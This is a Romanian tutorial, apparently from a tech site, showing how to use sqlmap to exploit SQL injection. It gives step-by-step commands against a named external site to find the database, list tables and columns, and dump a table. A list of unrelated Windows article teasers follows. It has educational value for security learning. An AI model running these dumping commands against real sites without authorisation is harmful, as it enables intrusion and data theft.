În această secțiune, LuckyTemplates vă va prezenta câteva instrumente folosite pentru a exploata SQL Injection .
În prezent, există multe instrumente de scanare a vulnerabilităților de securitate (inclusiv injecția SQL). Aceste instrumente permit detectarea și exploatarea vulnerabilităților de injectare SQL destul de puternic. Unele instrumente de exploatare a vulnerabilităților de injectare automată SQL utilizate în mod obișnuit includ:
Există și alte instrumente la care vă puteți referi, cum ar fi: Netsparker, jSQL Injection, Burp, BBQSQL...
Mai jos este o demonstrație a utilizării Sqlmap pentru a exploata injecția de bază SQL.
Descărcați Sqlmap de la http://sqlmap.org/
Sqlmap este scris în Python, așa că pentru a utiliza acest instrument trebuie să instalați Python. Puteți descărca python de la http://www.python.org/downloads/
Mai întâi trebuie să identificați site-ul țintă, aici am următoarea țintă: http://zerocoolhf.altervista.org/level1.php?id=1 (această pagină este acum moartă).
Pasul 1 : Deschideți cmd și tastați următoarea comandă:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap va detecta vulnerabilitatea țintei și va oferi informații despre vulnerabilitate.
Pasul 2 : Odată ce am stabilit că site-ul țintă are o vulnerabilitate de injectare SQL, procedăm la găsirea numelui bazei de date.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Baza de date: my_zerocoolhf
Pasul 3 : După determinarea numelui bazei de date, vom continua să găsim numele tabelelor din baza de date.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Există 2 tabele în baza de date: auth și book
Pasul 4 : Determinați numele coloanelor din tabel
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Identificați coloanele din tabelul cărții: autor, id, preț, titlu.
Pasul 5 : descărcați datele din tabel.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> Deci am obținut baza de date a site-ului țintă.
Mai sus este o demonstrație de bază a utilizării sqlmap pentru a exploata erorile de injectare SQL. Puteți afla mai multe despre opțiunile sqlmap la https://github.com/sqlmapproject/sqlmap/wiki/Usage pentru a sprijini exploatarea. Exploatare de injecție SQL.
Vedeți o notificare de activare a Windows 10 în colțul din dreapta al ecranului? Acest articol vă va ghida cum să ștergeți notificarea de solicitare a drepturilor de autor pe Windows 10.
Recent, Microsoft a lansat cea mai recentă actualizare cumulativă pentru utilizatorii de PC Windows 10 numită Build 14393.222. Această actualizare lansată pentru Windows 10 remediază în principal erorile pe baza feedback-ului utilizatorilor și îmbunătățește experiența de performanță a sistemului de operare.
Aveți computere în rețeaua locală care au nevoie de acces extern? Utilizarea unei gazde bastion ca gatekeeper pentru rețeaua dvs. poate fi o soluție bună.
Uneori, poate fi necesar să ștergeți jurnalele vechi de evenimente dintr-o dată. În acest ghid, Quantrimang.com vă va arăta 3 moduri de a șterge rapid toate jurnalele de evenimente din Windows 10 Event Viewer.
Dacă preferați să utilizați o tastatură clasică veche, cum ar fi IBM Model M, care nu include o tastă fizică Windows, există o metodă ușoară de a adăuga mai multe, împrumutând o tastă pe care nu o utilizați des.
WindowTop este un instrument care are capacitatea de a estompa toate ferestrele aplicațiilor și programele care rulează pe computere cu Windows 10. Sau puteți utiliza o interfață cu fundal întunecat pe Windows.
În multe articole anterioare, am menționat că păstrarea anonimatului online este extrem de importantă. Informații private sunt scurse în fiecare an, ceea ce face securitatea online din ce în ce mai necesară. Acesta este și motivul pentru care ar trebui să folosim adrese IP virtuale. Mai jos, vom afla despre metodele de a crea IP-uri false!
Bara de limbă din Windows 8 este o bară de instrumente de limbă în miniatură concepută pentru a fi afișată automat pe ecranul desktop. Cu toate acestea, mulți oameni doresc să ascundă această bară de limbă în bara de activități.
Maximizarea vitezei de internet este esențială pentru optimizarea conexiunii la rețea. Puteți avea o experiență optimă de divertisment și de lucru folosind computere, televizoare gata de internet, console de jocuri etc.
Conectivitatea wireless este o necesitate astăzi și, din această cauză, securitatea wireless este esențială pentru a asigura siguranța în rețeaua dumneavoastră internă.
